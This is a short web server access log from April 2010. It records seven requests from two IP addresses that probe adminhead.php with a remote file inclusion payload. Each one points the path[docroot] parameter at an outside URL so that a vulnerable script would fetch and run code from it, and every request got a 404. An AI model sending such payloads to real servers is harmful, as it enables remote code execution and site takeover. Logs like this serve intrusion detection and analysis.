84.20.28.118 - - [20/Apr/2010:06:19:01 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.143.142 - - [20/Apr/2010:06:19:06 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
